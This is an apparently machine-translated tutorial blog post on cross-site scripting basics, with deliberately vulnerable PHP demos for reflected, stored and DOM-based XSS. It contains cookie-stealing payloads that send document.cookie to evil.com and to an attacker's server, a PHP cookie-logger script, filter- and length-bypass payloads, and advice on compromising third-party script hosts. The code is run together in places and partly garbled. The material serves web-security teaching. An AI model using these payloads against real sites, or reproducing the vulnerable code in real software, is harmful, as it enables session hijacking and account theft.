Combining code to learn about the basics of XSS

Someone once said that XSS is so popular, because every website, including Google, Microsoft, and so on, there will be an XSS vulnerability! Before the XSS this piece of "fat" just understand, no systematic study. Take advantage of the summer vacation, to systematically analyze this piece of ' fat '.

0x01 XSS Basics

• Cross Site Script
• For Web Client
• From Js/activex/flash ...

JS XSS usage Scenario

• Embed HTML directly:<script>alert(/xss/);</script>
• Element Tag event:<body onload=alert(/xss/)>
• Picture Tags:
• Other Tags:<iframe>,<div>, and <link>
• Dom object, tampering with page content

XSS can be divided into the following categories depending on the effect:

1. Reflection Type XSS
2. Storage-Type XSS
3. Dom Based XSS by modifying the XSS formed by the DOM nodes

Ease of Use: 2>3>1

1234567891011

<?php/** 反射型XSS 演示*/    error_reporting(0);    $text = $_GET[‘name‘];?><input type="text" id="text" value="<?php echo $text ?>" />Payload：?name=">

1234567891011121314151617181920212223

<?php/** 存储型XSS 演示*/  error_reporting(7);  $name = $_GET[‘name‘];  $conn = mysql_connect("127.0.0.1","root","5688");  mysql_select_db("test",$conn);  mysql_query(‘set names "utf8"‘);  $sql_insert = "insert into liuyan(content) values(‘$name‘)";  $result = mysql_query($sql_insert,$conn);  $sql_select = "select * from liuyan";  $results = mysql_fetch_array(mysql_query($sql_select));  echo $results[content];?> Step 1: ?name=<scRipt>Alert(1)</scrIpt>Step 2: result

123456789101112131415161718

<?php/** DOM Based XSS 演示*/  error_reporting(0);  $name = $_GET[‘name‘];?><input id="text" type="text" value="<?php echo $name ?>" /><div id="print"></div><script>    var text = document.getElementById(‘text‘);    var print = document.getElementById(‘print‘);    print.innerHTML = text.value;</script>Payload: ?name=

0x02 XSS Payload

After an XSS attack succeeds, an attacker can control the user's browser by implanting a malicious script on the page of the user's current browser. These malicious scripts, known as "XSS Payload"

Cookie Hijacking

12345678

http://www.a.com/test.php?abc="><script src =http://evil.com/evil.js></script>evil.js content: var img = document.createElement("img"); img.src = "http://www.evil.com/log?"+escape(document.cookie); document.body.appendChild(img); PS:log不一定要存在，因为在日志中会记录下这个过程

This is the basic process of XSS hijacking cookies, and when you get the user cookie, how do you use it to log into the server? In this process, there are a number of methods, there are two ways:

• Burpsuit Proxy Modify Cookie
• Firefox plugin Data Tamper truncation request Modify Cookie

PHP XSS Cookie require

123456789

<?php  $cookie = $_GET[‘c‘];  $ip = getenv(‘REMOTE_ADDR‘);  $time = data("j F, Y, g:i a");  $referer = getenv(‘HTTP_REFERER‘);  $fp = fopen(‘cookie.txt‘,‘a‘);  fwrite($fp.‘Cookie: ‘.$cookie.‘<br/> IP: ‘.$ip.‘<br> Data and Time: ‘.$time.‘<br>Referer: ‘.$referer.‘<br><br>‘);  fclose($fp);?>

Save the above to your own server, 1.php
Then write to the XSS:

1	<script>document.location="http://your server/1.php?c="+document.cookie;</script>

Construct get with POST request XSS phishing identify user browser identify user install software CSS history hack get user real ip0x03 XSS attack platform

• Attack API
• BeEF
• Xss-proxy

0x04 XSS worm0x05 XSS Construction Tips

The most basic construction technique is the "closed tag",

Using character encoding

Here's the first one of the things that brother said in the white hat talk about web security is that when the Web page is encoded as gbk/gb2312, the "%c1\" bypasses the system escape "situation ...

The next is the various encryption

URL-encoded Unicode-encoded HTML encoding

The existence of HTML encoding is to let him separate in the code and display, to avoid errors. His named entity: The structure is & with the Greek alphabet, character encoding: Constructs are & #加十进制, hexadecimal ASCII or Unicode character encoding, and browser parsing will first parse the HTML encoding and then render. However, there is a premise that it must be in the "value", such as the attribute src, but the SRC cannot be HTML-encoded. Otherwise the browser will not render properly.

1	<imgsrc=&#108;&#111;&#103;&#111;&#46;&#112;&#110;&#103;/>

CSS encoding

Slash/Plus 1-6-bit 16 decimal

common ways to bypass

1234	<sCript>alert(1)</scRipt><script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript><scr<script>rip>alalertert</scr</script>rip> (需要利用waf的不完整性)<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>

Bypassing length limits

12	<inputtype="text" value="$var"/>length($var)<=20

Method One: Shorten payload by events

1	"onclick=alert(1)//

Method Two: Use Location.hash to load XSS payload

123456789

Payload:   " onclick="eval(location.hash.substr(1))<input type="text" value="" onclick="eval(location.hash.substr(1))" /> location.hash的第一个字符为# 则 http://www.a.com/test.html#alert(1) 产生效果location.hash本身没有长度限制，而浏览器URL有，在这个范围内都是可以的。

Method Three: Use the annotation character to bypass the length limit

123	有两个输入框，第一个有限制，第二个没有长度限制，则可以通过注释符打通两个注释框之间的部分：input1#value: "><!--input2#value: --><script>alert(/xss/);<script/>

Using labels

The role of tags in HTML is to provide a real address for all links that use relative paths.

This process can be exploited, assuming that you can insert a base tag somewhere on the page and forge a link on your server that payload the corresponding image, you can achieve the attack effect

1	<baseherf="http://www.evil.com/"/>

Window.name Magical

You can use this to achieve cross-domain effects

1234567

a.com中，window.name=testlocation.href="http://www.b.com/xss.php"b.com中，加入  document.domain + window.name 即可轻松实现从a->b的跨越

0x06 some wonderful attack tactics third-party hijacking (outward j/c)

Simply speaking is to see your target site references which external sites js/css/swf/, and so on, and then invade the corresponding external station, and then modify the js/css/swf to achieve the effect of XSS, the use of "roundabout" infiltration mode

Here refers to a "long short" write a Get non-site J/C code:

1234567

for(var i=0,tags=document.querySelectorAll(‘iframe[src],frame[src],script[src],link[rel=stylesheet],object[data],embed[src]‘),tag;tag=tags[i];i++){  var a = document.createElement(‘a‘);  a.href = tag.src||tag.href||tag.data;  if(a.hostname!=location.hostname){    console.warn(location.hostname+‘ 发现第三方资源[‘+tag.localName+‘]:‘+a.href);  }}

Just execute this code in the browser console

0x07 JavaScript Development Framework Xssjquery

jquery has an HTML () method, which, if there are no parameters, reads the innerHTML of a DOM node, and if there is a parameter, it writes the value of the parameter to the innerHTML of the DOM node. This process may produce "DOM Based XSS"

1	$(‘div.demo-contaioner‘).html(");

In addition, some other example Dojo/yui itself has an XSS vulnerability.

Https://www.ohlinge.cn/web/xss.html

Combining code to learn about the basics of XSS